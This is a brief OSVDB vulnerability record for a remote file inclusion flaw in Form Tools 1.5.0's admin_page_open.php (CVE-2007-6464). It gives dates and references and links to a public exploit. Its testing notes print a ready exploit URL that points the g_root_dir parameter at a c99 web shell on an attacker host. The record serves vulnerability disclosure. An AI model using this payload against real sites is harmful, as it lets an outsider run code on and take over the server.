Form Tools admin_page_open.php g_root_dir Variable Remote File Inclusion

2007-12-14T00:00:00
ID OSVDB:40254
Type osvdb
Reporter OSVDB
Modified 2007-12-14T00:00:00

Description

Manual Testing Notes

http://[target]/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://[attacker]/shells/c99.txt?

References:

Related OSVDB ID: 40255 Generic Exploit URL: http://www.milw0rm.com/exploits/4736 CVE-2007-6464